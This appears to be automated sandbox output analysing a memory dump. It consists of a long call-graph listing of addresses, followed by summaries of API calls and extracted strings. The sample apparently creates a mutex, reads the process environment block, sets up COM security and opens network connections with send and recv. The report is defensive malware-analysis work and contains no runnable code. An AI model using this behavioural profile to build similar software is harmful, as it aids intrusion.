61725->61731 61732 7f3463a0 std::ios_base::clear 32 API calls 61726->61732 61733 7f375cbb 61727->61733 62388 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61728->62388 61729 7f376489 61739 7f3345e0 53 API calls 61729->61739 61735 7f3463a0 std::ios_base::clear 32 API calls 61730->61735 61736 7f3463a0 std::ios_base::clear 32 API calls 61731->61736 61737 7f375f71 61732->61737 61738 7f3463a0 std::ios_base::clear 32 API calls 61733->61738 61740 7f3767ca 61735->61740 61741 7f37621c 61736->61741 61742 7f3ac670 53 API calls 61737->61742 61743 7f375cdc 61738->61743 61744 7f3764b8 61739->61744 61852 7f3ac670 61740->61852 61746 7f3463a0 std::ios_base::clear 32 API calls 61741->61746 61747 7f375f87 61742->61747 61748 7f3b0dd0 111 API calls 61743->61748 62401 7f334770 32 API calls 61744->62401 61751 7f37623d 61746->61751 61752 7f3463a0 std::ios_base::clear 32 API calls 61747->61752 61753 7f375cec 61748->61753 61757 7f3463a0 std::ios_base::clear 32 API calls 61751->61757 61758 7f375fa8 61752->61758 62392 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61753->62392 61755 7f3764bf 61759 7f3463a0 std::ios_base::clear 32 API calls 61755->61759 61756 7f3463a0 std::ios_base::clear 32 API calls 61760 7f376801 61756->61760 61761 7f37625e 61757->61761 61762 7f3463a0 std::ios_base::clear 32 API calls 61758->61762 61764 7f3764e0 61759->61764 61765 7f3463a0 std::ios_base::clear 32 API calls 61760->61765 61766 7f3ac670 53 API calls 61761->61766 61763 7f375fc9 61762->61763 61767 7f3b0dd0 111 API calls 61763->61767 61768 7f3463a0 std::ios_base::clear 32 API calls 61764->61768 61769 7f376822 61765->61769 61770 7f376274 61766->61770 61772 7f375fd9 61767->61772 61773 7f376512 61768->61773 61971 7f3b0dd0 61769->61971 61771 7f3463a0 std::ios_base::clear 32 API calls 61770->61771 61775 7f376295 61771->61775 62395 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61772->62395 
61777 7f3463a0 std::ios_base::clear 32 API calls 61773->61777 61781 7f3463a0 std::ios_base::clear 32 API calls 61775->61781 61779 7f376533 61777->61779 61782 7f3463a0 std::ios_base::clear 32 API calls 61779->61782 61784 7f3762b6 61781->61784 61785 7f376554 61782->61785 61786 7f3b0dd0 111 API calls 61784->61786 61787 7f3ac670 53 API calls 61785->61787 61788 7f3762c6 61786->61788 61789 7f37656a 61787->61789 62398 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61788->62398 61791 7f3463a0 std::ios_base::clear 32 API calls 61789->61791 61793 7f37658b 61791->61793 61792->61661 61794 7f3463a0 std::ios_base::clear 32 API calls 61793->61794 61795 7f3765ac 61794->61795 61797 7f3b0dd0 111 API calls 61795->61797 61798 7f3765bc 61797->61798 62402 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61798->62402 61844 7f3467d0 61801->61844 61813 7f334609 61812->61813 61814 7f33464e 61813->61814 62403 7f348760 53 API calls 2 library calls 61813->62403 61818 7f3346c5 61814->61818 61819 7f334674 61814->61819 61816 7f334637 61817 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 61816->61817 61817->61814 61823 7f3467d0 std::ios_base::clear 32 API calls 61818->61823 61820 7f3467d0 std::ios_base::clear 32 API calls 61819->61820 61821 7f334680 61820->61821 62404 7f33a930 53 API calls 61821->62404 61824 7f3346d9 61823->61824 62409 7f334860 32 API calls std::ios_base::clear 61824->62409 61825 7f3346a6 62405 7f37b900 61825->62405 61828 7f3346fb 62410 7f3844c0 32 API calls std::ios_base::clear 61828->62410 61829 7f3346bd 61837 7f3342d0 61829->61837 61831 7f334720 62411 7f3d1f75 RaiseException 61831->62411 61833 7f334734 61834 7f37b900 std::ios_base::clear 30 API calls 61833->61834 61835 7f334740 61834->61835 61836 7f37b900 std::ios_base::clear 30 API calls 61835->61836 61836->61829 62413 7f333170 61837->62413 61839 7f3342f7 61840 7f37ca10 
Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 61839->61840 61841 7f33430f 61840->61841 61842 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 61841->61842 61843 7f33431c 61842->61843 61843->61322 61843->61323 61845 7f34683a 61844->61845 61845->61845 62470 7f335370 61845->62470 61847 7f346871 61848 7f3463a0 61847->61848 61849 7f34641c 61848->61849 62478 7f3354a0 61849->62478 61851 7f346461 61851->61713 61853 7f333170 53 API calls 61852->61853 61854 7f3ac6b5 61853->61854 61855 7f333170 53 API calls 61854->61855 61856 7f3ac6e2 61855->61856 62486 7f345f50 61856->62486 61859 7f333170 53 API calls 61860 7f3ac773 61859->61860 62507 7f3331d0 61860->62507 61863 7f345f50 53 API calls 61864 7f3ac803 61863->61864 61865 7f333170 53 API calls 61864->61865 61866 7f3ac830 61865->61866 61867 7f3331d0 53 API calls 61866->61867 61868 7f3ac85c 61867->61868 61869 7f345f50 53 API calls 61868->61869 61870 7f3ac8c0 61869->61870 61871 7f333170 53 API calls 61870->61871 61872 7f3ac8ed 61871->61872 61873 7f3331d0 53 API calls 61872->61873 61874 7f3ac919 61873->61874 61875 7f345f50 53 API calls 61874->61875 61876 7f3ac97d 61875->61876 61877 7f333170 53 API calls 61876->61877 61878 7f3ac9aa 61877->61878 61879 7f3331d0 53 API calls 61878->61879 61880 7f3ac9d6 61879->61880 61881 7f345f50 53 API calls 61880->61881 61882 7f3aca3a 61881->61882 61883 7f333170 53 API calls 61882->61883 61884 7f3aca67 61883->61884 61885 7f3331d0 53 API calls 61884->61885 61886 7f3aca96 61885->61886 61887 7f345f50 53 API calls 61886->61887 61888 7f3acafa 61887->61888 61889 7f333170 53 API calls 61888->61889 61890 7f3acb27 61889->61890 61891 7f3331d0 53 API calls 61890->61891 61892 7f3acb56 61891->61892 61893 7f345f50 53 API calls 61892->61893 61894 7f3acbba 61893->61894 61895 7f333170 53 API calls 61894->61895 61896 7f3acbe7 61895->61896 61897 7f3331d0 53 API calls 61896->61897 61898 7f3acc16 61897->61898 61899 7f345f50 53 API calls 61898->61899 
61900 7f3acc7a 61899->61900 61901 7f333170 53 API calls 61900->61901 61902 7f3acca7 61901->61902 61903 7f3331d0 53 API calls 61902->61903 61904 7f3accd6 61903->61904 61905 7f345f50 53 API calls 61904->61905 61906 7f3acd3a 61905->61906 61907 7f333170 53 API calls 61906->61907 61908 7f3acd67 61907->61908 61909 7f3331d0 53 API calls 61908->61909 61910 7f3acd96 61909->61910 61911 7f345f50 53 API calls 61910->61911 61912 7f3acdfa 61911->61912 61913 7f333170 53 API calls 61912->61913 61914 7f3ace27 61913->61914 61915 7f3331d0 53 API calls 61914->61915 61916 7f3ace59 61915->61916 61917 7f345f50 53 API calls 61916->61917 61918 7f3acebd 61917->61918 61919 7f333170 53 API calls 61918->61919 61920 7f3aceea 61919->61920 62512 7f339620 61920->62512 61925 7f345f50 53 API calls 61926 7f3acfaf 61925->61926 61927 7f333170 53 API calls 61926->61927 61928 7f3acfdc 61927->61928 61929 7f3331d0 53 API calls 61928->61929 61930 7f3ad014 61929->61930 61931 7f345f50 53 API calls 61930->61931 61932 7f3ad078 61931->61932 61933 7f333170 53 API calls 61932->61933 61934 7f3ad0ab 61933->61934 61935 7f339620 32 API calls 61934->61935 61936 7f3ad0e4 61935->61936 61937 7f333b60 53 API calls 61936->61937 61938 7f3ad11e 61937->61938 61939 7f345f50 53 API calls 61938->61939 61940 7f3ad182 61939->61940 61941 7f333170 53 API calls 61940->61941 61942 7f3ad1b5 61941->61942 61943 7f3331d0 53 API calls 61942->61943 61944 7f3ad1ed 61943->61944 61945 7f345f50 53 API calls 61944->61945 61946 7f3ad251 61945->61946 61947 7f333170 53 API calls 61946->61947 61948 7f3ad284 61947->61948 62521 7f333230 61948->62521 61951 7f345f50 53 API calls 61952 7f3ad320 61951->61952 61953 7f345f50 53 API calls 61952->61953 61954 7f3ad36c 61953->61954 61955 7f37b900 std::ios_base::clear 30 API calls 61954->61955 61956 7f3ad3df 61955->61956 61957 7f37b900 std::ios_base::clear 30 API calls 61956->61957 61958 7f3ad420 61957->61958 62526 7f345d40 61958->62526 61961 7f37ca10 
Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 61962 7f3ad55a 61961->61962 61963 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 61962->61963 61964 7f3ad56d 61963->61964 61965 7f37b900 std::ios_base::clear 30 API calls 61964->61965 61966 7f3ad579 61965->61966 61967 7f37b900 std::ios_base::clear 30 API calls 61966->61967 61968 7f3ad585 61967->61968 61969 7f37b900 std::ios_base::clear 30 API calls 61968->61969 61970 7f3767e0 61969->61970 61970->61756 61972 7f3b0e0c 61971->61972 62625 7f351590 61972->62625 61974 7f3b0e3c 62629 7f350230 61974->62629 61976 7f3b0e66 62633 7f3529a0 61976->62633 61978 7f3b0e87 61982 7f3b0f13 61978->61982 62918 7f37caa0 61978->62918 61979 7f3b0f82 61980 7f333170 53 API calls 61979->61980 61983 7f3b0f9e 61980->61983 61982->61979 61985 7f37caa0 32 API calls 61982->61985 61984 7f3463a0 std::ios_base::clear 32 API calls 61983->61984 61986 7f3b0fc9 61984->61986 61985->61979 61986->61986 61987 7f335370 std::ios_base::clear 32 API calls 61986->61987 61988 7f3b106a 61987->61988 62637 7f384610 61988->62637 61990 7f3b1084 std::ios_base::clear 62650 7f394b90 GetPEB 61990->62650 61993 7f333170 53 API calls 61994 7f3b10de 61993->61994 61995 7f345f50 53 API calls 61994->61995 61996 7f3b1142 61995->61996 61997 7f333170 53 API calls 61996->61997 61998 7f3b1175 61997->61998 61999 7f3463a0 std::ios_base::clear 32 API calls 61998->61999 62000 7f3b11a0 61999->62000 62001 7f3345e0 53 API calls 62000->62001 62002 7f3b11ca 62001->62002 62003 7f33d200 32 API calls 62002->62003 62004 7f3b11e2 62003->62004 62005 7f384610 32 API calls 62004->62005 62006 7f3b1201 std::ios_base::clear 62005->62006 62007 7f394b90 4 API calls 62006->62007 62008 7f3b1234 62007->62008 62009 7f333170 53 API calls 62008->62009 62010 7f3b125b 62009->62010 62011 7f345f50 53 API calls 62010->62011 62012 7f3b12bf 62011->62012 62013 7f333170 53 API calls 62012->62013 62014 7f3b12f2 62013->62014 62015 7f3463a0 
std::ios_base::clear 32 API calls 62014->62015 62016 7f3b131d 62015->62016 62017 7f3345e0 53 API calls 62016->62017 62018 7f3b1347 62017->62018 62019 7f33d200 32 API calls 62018->62019 62020 7f3b135f 62019->62020 62021 7f384610 32 API calls 62020->62021 62022 7f3b137e std::ios_base::clear 62021->62022 62023 7f394b90 4 API calls 62022->62023 62024 7f3b13b1 62023->62024 62025 7f333170 53 API calls 62024->62025 62026 7f3b13d8 62025->62026 62027 7f345f50 53 API calls 62026->62027 62028 7f3b143c 62027->62028 62029 7f333170 53 API calls 62028->62029 62030 7f3b146f 62029->62030 62031 7f3463a0 std::ios_base::clear 32 API calls 62030->62031 62032 7f3b149a 62031->62032 62033 7f3345e0 53 API calls 62032->62033 62034 7f3b14c4 62033->62034 62035 7f33d200 32 API calls 62034->62035 62036 7f3b14dc 62035->62036 62037 7f384610 32 API calls 62036->62037 62038 7f3b14fb std::ios_base::clear 62037->62038 62039 7f394b90 4 API calls 62038->62039 62040 7f3b152e 62039->62040 62041 7f333170 53 API calls 62040->62041 62042 7f3b1555 62041->62042 62043 7f345f50 53 API calls 62042->62043 62044 7f3b15b9 62043->62044 62045 7f333170 53 API calls 62044->62045 62046 7f3b15ec 62045->62046 62047 7f3463a0 std::ios_base::clear 32 API calls 62046->62047 62048 7f3b1617 62047->62048 62049 7f3345e0 53 API calls 62048->62049 62050 7f3b1641 62049->62050 62051 7f33d200 32 API calls 62050->62051 62052 7f3b1659 62051->62052 62053 7f384610 32 API calls 62052->62053 62054 7f3b167a std::ios_base::clear 62053->62054 62055 7f394b90 4 API calls 62054->62055 62056 7f3b16ad 62055->62056 62057 7f333170 53 API calls 62056->62057 62058 7f3b16d4 62057->62058 62059 7f345f50 53 API calls 62058->62059 62060 7f3b1738 62059->62060 62061 7f333170 53 API calls 62060->62061 62062 7f3b176b 62061->62062 62063 7f3463a0 std::ios_base::clear 32 API calls 62062->62063 62064 7f3b1796 62063->62064 62654 7f346480 62064->62654 62067 7f384610 32 API calls 62068 7f3b17d5 std::ios_base::clear 62067->62068 62069 7f394b90 4 API calls 62068->62069 
62070 7f3b1808 62069->62070 62071 7f333170 53 API calls 62070->62071 62072 7f3b182f 62071->62072 62073 7f345f50 53 API calls 62072->62073 62074 7f3b1893 62073->62074 62075 7f333170 53 API calls 62074->62075 62076 7f3b18c6 62075->62076 62077 7f3463a0 std::ios_base::clear 32 API calls 62076->62077 62078 7f3b18f1 62077->62078 62079 7f346480 32 API calls 62078->62079 62080 7f3b191d 62079->62080 62081 7f384610 32 API calls 62080->62081 62082 7f3b1933 std::ios_base::clear 62081->62082 62083 7f394b90 4 API calls 62082->62083 62084 7f3b1966 62083->62084 62085 7f333170 53 API calls 62084->62085 62086 7f3b198d 62085->62086 62087 7f345f50 53 API calls 62086->62087 62088 7f3b19f1 62087->62088 62089 7f345f50 53 API calls 62088->62089 62090 7f3b1a3a 62089->62090 62091 7f37b900 std::ios_base::clear 30 API calls 62090->62091 62092 7f3b1a7b 62091->62092 62093 7f37b900 std::ios_base::clear 30 API calls 62092->62093 62094 7f3b1aa3 62093->62094 62095 7f37b900 std::ios_base::clear 30 API calls 62094->62095 62096 7f3b1acb 62095->62096 62097 7f37b900 std::ios_base::clear 30 API calls 62096->62097 62098 7f3b1af3 62097->62098 62099 7f37b900 std::ios_base::clear 30 API calls 62098->62099 62100 7f3b1b1b 62099->62100 62101 7f37b900 std::ios_base::clear 30 API calls 62100->62101 62102 7f3b1b43 62101->62102 62103 7f37b900 std::ios_base::clear 30 API calls 62102->62103 62104 7f3b1b6b 62103->62104 62660 7f392690 62104->62660 62106 7f3b1b82 std::ios_base::clear 62107 7f394b90 4 API calls 62106->62107 62108 7f3b1bb5 62107->62108 62108->62108 62109 7f335370 std::ios_base::clear 32 API calls 62108->62109 62110 7f3b1c39 62109->62110 62111 7f37b900 std::ios_base::clear 30 API calls 62110->62111 62112 7f3b1c48 62111->62112 62675 7f3348e0 62112->62675 62116 7f3b1c7d 62117 7f37b900 std::ios_base::clear 30 API calls 62116->62117 62118 7f3b1c88 62117->62118 62119 7f3463a0 std::ios_base::clear 32 API calls 62118->62119 62120 7f3b1c9f 62119->62120 62121 7f3463a0 std::ios_base::clear 32 API calls 62120->62121 
62122 7f3b1cbd 62121->62122 62123 7f3463a0 std::ios_base::clear 32 API calls 62122->62123 62124 7f3b1cdb 62123->62124 62685 7f3b4560 62124->62685 62307 7f33d22d 62306->62307 63243 7f33d0d0 62307->63243 62309 7f33d250 std::ios_base::clear 62310 7f37b900 std::ios_base::clear 30 API calls 62309->62310 62311 7f33d277 62310->62311 62311->61334 62313 7f37ca3c 62312->62313 62314 7f37ca1f 62312->62314 62315 7f37ca64 62313->62315 63267 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62313->63267 62314->62313 63266 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62314->63266 62319 7f373c9c 62315->62319 63268 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62315->63268 62320 7f386350 62319->62320 62321 7f386385 std::exception::exception 62320->62321 62322 7f38656d 62321->62322 62323 7f38638f 62321->62323 62350 7f38653f Concurrency::cancellation_token_source::~cancellation_token_source 62322->62350 63271 7f3b7e00 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62322->63271 63269 7f3b7e00 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62323->63269 62326 7f3869fb 62329 7f386a20 62326->62329 62330 7f386a07 62326->62330 62327 7f345d40 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62327->62350 62328 7f3863c6 Concurrency::cancellation_token_source::~cancellation_token_source 63270 7f339840 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62328->63270 63278 7f348f90 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62329->63278 62331 7f386a11 62330->62331 62332 7f386ab2 62330->62332 62338 7f37b900 std::ios_base::clear 30 API calls 62331->62338 62347 7f386a1b std::ios_base::_Ios_base_dtor 62331->62347 62335 7f37b800 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 62332->62335 
62339 7f386ac8 std::ios_base::_Ios_base_dtor 62335->62339 62337 7f386a36 std::ios_base::_Ios_base_dtor 62337->62347 63279 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62337->63279 62341 7f386b5a std::ios_base::_Ios_base_dtor 62338->62341 62339->62347 63280 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62339->63280 62340 7f37b800 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 62344 7f386bd9 62340->62344 62341->62347 63281 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62341->63281 62342 7f3865b8 Concurrency::cancellation_token_source::~cancellation_token_source 62342->62350 63272 7f336b40 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62342->63272 62344->61322 62347->62340 62349 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62349->62350 62350->62326 62350->62327 62350->62349 62352 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 62350->62352 63273 7f3b4330 53 API calls 2 library calls 62350->63273 63274 7f339840 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63274 63275 7f383a90 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63275 63276 7f336b40 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63276 63277 7f3839e0 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62350->63277 62352->62350 62356->61349 62357->61361 62358->61330 62359->61364 62360->61383 62361->61341 62362->61388 62363->61411 62364->61359 62365->61417 62366->61444 62367->61381 62368->61450 62369->61475 62370->61404 62371->61482 62372->61501 62373->61435 62374->61513 62375->61534 62376->61468 62377->61526 62378->61533 62379->61568 62380->61499 62381->61554 62382->61567 62383->61600 
62384->61532 62385->61586 62386->61599 62387->61634 62388->61559 62389->61619 62390->61633 62391->61663 62392->61591 62393->61670 62394->61687 62395->61624 62396->61693 62397->61719 62398->61792 62399->61707 62400->61729 62401->61755 62402->61801 62403->61816 62404->61825 62406 7f37b92d 62405->62406 62408 7f37b994 std::ios_base::_Ios_base_dtor 62406->62408 62412 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62406->62412 62408->61829 62409->61828 62410->61831 62411->61833 62412->62408 62418 7f345570 62413->62418 62416 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62417 7f3331bf 62416->62417 62417->61839 62423 7f33b830 62418->62423 62421 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62422 7f3331b4 62421->62422 62422->62416 62432 7f37c440 62423->62432 62426 7f3467d0 std::ios_base::clear 32 API calls 62428 7f33b8b6 62426->62428 62427 7f33b8df 62441 7f349600 62427->62441 62428->62427 62445 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62428->62445 62431 7f33b91a 62431->62421 62433 7f37c45f 62432->62433 62434 7f37c45a 62432->62434 62436 7f37c480 62433->62436 62437 7f37c46f 62433->62437 62446 7f37b280 RaiseException Concurrency::cancel_current_task 62434->62446 62438 7f33b85c 62436->62438 62448 7f3d0c5b 62436->62448 62447 7f334a80 32 API calls 3 library calls 62437->62447 62438->62426 62442 7f349627 62441->62442 62444 7f34966c std::ios_base::_Ios_base_dtor 62441->62444 62442->62444 62469 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62442->62469 62444->62431 62445->62427 62446->62433 62447->62438 62451 7f3d0c60 62448->62451 62450 7f3d0c7a 62450->62438 62451->62450 62453 7f3d0c7c Concurrency::cancel_current_task 62451->62453 62456 7f3df956 62451->62456 62465 7f3e0846 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 62451->62465 62466 7f3d1f75 
RaiseException 62453->62466 62455 7f3d18b1 62457 7f3e5259 62456->62457 62458 7f3e5297 62457->62458 62460 7f3e5282 HeapAlloc 62457->62460 62463 7f3e526b _memcpy_s 62457->62463 62468 7f3d5b8e 14 API calls _memcpy_s 62458->62468 62461 7f3e5295 62460->62461 62460->62463 62462 7f3e529c 62461->62462 62462->62451 62463->62458 62463->62460 62467 7f3e0846 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 62463->62467 62465->62451 62466->62455 62467->62463 62468->62462 62469->62444 62471 7f335387 std::ios_base::clear 62470->62471 62473 7f335391 std::ios_base::clear 62471->62473 62476 7f37bc00 32 API calls std::ios_base::clear 62471->62476 62475 7f3353aa _memcpy_s 62473->62475 62477 7f334a00 32 API calls 2 library calls 62473->62477 62475->61847 62476->62473 62477->62475 62479 7f3354b7 std::ios_base::clear 62478->62479 62481 7f3354c1 std::ios_base::clear 62479->62481 62484 7f37bc00 32 API calls std::ios_base::clear 62479->62484 62483 7f3354da _memcpy_s 62481->62483 62485 7f334a00 32 API calls 2 library calls 62481->62485 62483->61851 62484->62481 62485->62483 62489 7f345fbc 62486->62489 62488 7f346061 62490 7f3460e1 62488->62490 62491 7f346069 62488->62491 62492 7f345fe0 62489->62492 62531 7f34cfd0 32 API calls 62489->62531 62536 7f33bee0 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62490->62536 62534 7f348760 53 API calls 2 library calls 62491->62534 62492->62488 62496 7f3467d0 std::ios_base::clear 32 API calls 62492->62496 62495 7f3460d9 62498 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 62495->62498 62497 7f34601c 62496->62497 62532 7f3844c0 32 API calls std::ios_base::clear 62497->62532 62501 7f34611d 62498->62501 62501->61859 62502 7f346079 62502->62495 62535 7f34b180 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62502->62535 62503 7f34603b 62533 7f3d1f75 RaiseException 62503->62533 62505 7f34604f 62506 7f37b900 std::ios_base::clear 30 API calls 
63962->63776 63962->63777 63966 7f3aef40 GetPEB 63963->63966 63965->63958 63966->63962 63968 7f34d5c9 63967->63968 63970 7f34d544 swprintf 63967->63970 63968->63799 63973 7f3d0fac 33 API calls 63970->63973 63971->63795 63972->63805 63973->63968 63975 7f34207e GetPEB 63974->63975 63976 7f34206c 63974->63976 63975->63811 63979 7f3aef40 GetPEB 63976->63979 63978->63815 63979->63975 63981 7f3afa1f 63980->63981 64011 7f341d60 63981->64011 63986 7f3afcf0 64019 7f341f70 63986->64019 63989 7f3afda7 64027 7f341f40 GetPEB 63989->64027 63991 7f3aff02 63992 7f3b01a9 63991->63992 63994 7f3b006b 63991->63994 64023 7f341cd0 63992->64023 64028 7f341f40 GetPEB 63994->64028 63997 7f3a9f03 63997->63822 63997->63824 63998 7f3b0321 64029 7f341f40 GetPEB 63998->64029 64001 7f341d4e 64000->64001 64002 7f341d3c 64000->64002 64005 7f341eb0 GetPEB 64001->64005 64034 7f3aef40 GetPEB 64002->64034 64004->63834 64005->63838 64006->63842 64007->63844 64008->63848 64009->63850 64010->63833 64012 7f341d7e 64011->64012 64013 7f341d6c 64011->64013 64012->63997 64015 7f341fa0 64012->64015 64030 7f3aef40 GetPEB 64013->64030 64016 7f341fbe CoInitializeSecurity 64015->64016 64017 7f341fac 64015->64017 64016->63986 64031 7f3aef40 GetPEB 64017->64031 64020 7f341f8e 64019->64020 64021 7f341f7c 64019->64021 64020->63989 64020->63991 64032 7f3aef40 GetPEB 64021->64032 64024 7f341cee CoSetProxyBlanket 64023->64024 64025 7f341cdc 64023->64025 64024->63997 64024->63998 64033 7f3aef40 GetPEB 64025->64033 64027->63997 64028->63997 64029->63997 64030->64012 64031->64016 64032->64020 64033->64024 64034->64001 64037 7f34edc9 64035->64037 64038 7f34ed44 swprintf 64035->64038 64037->63853 64048 7f3d0fac 33 API calls 64038->64048 64040 7f34bcc1 64039->64040 64042 7f34bc3c swprintf 64039->64042 64040->63859 64049 7f3d0fac 33 API calls 64042->64049 64044 7f350971 64043->64044 64046 7f3508ec swprintf 64043->64046 64044->63864 64050 7f3d0fac 33 API calls 64046->64050 64047->63870 64048->64037 64049->64040 64050->64044 
64052 7f34e5ad 64051->64052 64054 7f34e528 swprintf 64051->64054 64052->63877 64055 7f3d0fac 33 API calls 64054->64055 64055->64052 64057 7f3ab43d GetPEB 64056->64057 64057->63914 64058->63912 64059->63913 64060->63920 64061->63926 64062->63930 64063->63932 64064->63934 64065->63936 64066->63938 64067->63940 64068->63942 64069->63944 64070->63946 64071->63948 64073 7f35301d 64072->64073 64075 7f352f98 swprintf 64072->64075 64073->63402 64119 7f3d0fac 33 API calls 64075->64119 64120 7f3471d0 64076->64120 64083 7f394d40 64084 7f3471d0 51 API calls 64083->64084 64085 7f394d68 64084->64085 64135 7f3bb390 64085->64135 64088 7f3472d0 32 API calls 64089 7f394d9f 64088->64089 64090 7f34a1a0 64089->64090 64091 7f34a210 64090->64091 64092 7f34a1ca 64090->64092 64094 7f34a22c 64091->64094 64142 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64091->64142 64093 7f3467d0 std::ios_base::clear 32 API calls 64092->64093 64095 7f34a1d7 64093->64095 64094->63408 64102 7f3b0b80 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64094->64102 64140 7f383dd0 32 API calls std::ios_base::clear 64095->64140 64098 7f34a1f0 64141 7f3d1f75 RaiseException 64098->64141 64100 7f34a201 64101 7f37b900 std::ios_base::clear 30 API calls 64100->64101 64101->64091 64102->63415 64103->63423 64104->63445 64105->63443 64106->63471 64107->63488 64108->63491 64109->63508 64110->63515 64111->63541 64112->63548 64113->63574 64114->63581 64115->63592 64116->63570 64117->63539 64118->63507 64119->64073 64121 7f347243 64120->64121 64123 7f347257 64120->64123 64133 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64121->64133 64124 7f3bb2b0 64123->64124 64125 7f3bb2c1 64124->64125 64127 7f37cee0 64124->64127 64134 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64125->64134 64128 7f3472d0 64127->64128 64129 7f3467d0 std::ios_base::clear 32 API calls 64128->64129 
64130 7f347339 64129->64130 64131 7f3467d0 std::ios_base::clear 32 API calls 64130->64131 64132 7f347349 64131->64132 64132->64083 64133->64123 64134->64127 64136 7f3bb3a1 64135->64136 64138 7f394d70 64135->64138 64139 7f3df80d 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 64136->64139 64138->64088 64139->64138 64140->64098 64141->64100 64142->64094
                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,?,?,?,A819E2D1,000CB52E), ref: 7F35BAF4
                      • GetProcessHeap.KERNEL32(FFFFB705,00000000,000000A8,00000000), ref: 7F35BB15
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Similarity
                      • API ID: CreateHeapMutexProcess
                      • String ID: 4A$-R*$6$APPLY_ALL_SHIMS$B$Directoryexpansion$FailedtocreateJson$Qj9j$TD$Windows::Compat::A$X$Y$Z$advapi32$comdlg32$h$m$tFailedtoaddbootent

                      Control-flow Graph

                      • control_flow_graph 1382, starting at 7f3728bf; named calls: GetCursor, GetPEB, Sleep, GetCursorPos, lstrlenW, SetLastError
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: 4A$?$Exceptionencounter$P$c$tFailedtoaddbootent${

                      Control-flow Graph

                      • control_flow_graph 2166, starting at 7f373992; named calls: GetPEB, Sleep, GetCursor, GetCursorPos, lstrlenW, SetLastError
                      APIs
                        • Part of subcall function 7F386350: std::exception::exception.LIBCMTD ref: 7F386380
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      • Sleep.KERNEL32(?), ref: 7F376ABF
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Similarity
                      • API ID: Cursor$Sleepstd::exception::exception
                      • String ID: 4A$?$Exceptionencounter$P$c${

                      Control-flow Graph

                      • control_flow_graph 2860, starting at 7f3afa00; named calls: CoInitializeSecurity, CoSetProxyBlanket
                      APIs
                      • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7F3AFC2A
                      • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7F3B030D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Similarity
                      • API ID: BlanketInitializeProxySecurity
                      • String ID: =$A$S$X$b$u$z
                      APIs
                        • Part of subcall function 7F333DC0: std::ios_base::clear.LIBCPMTD ref: 7F33422A
                      • socket.WS2_32(?,?,?), ref: 7F3B5493
                      • gethostbyname.WS2_32(?), ref: 7F3B582F
                      • connect.WS2_32(?,?,?), ref: 7F3B6425
                      • send.WS2_32(?,?,?,?), ref: 7F3B6819
                      • recv.WS2_32(?,?,?,?), ref: 7F3B6C72
                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7F3B7B6B
                      Memory Dump Source
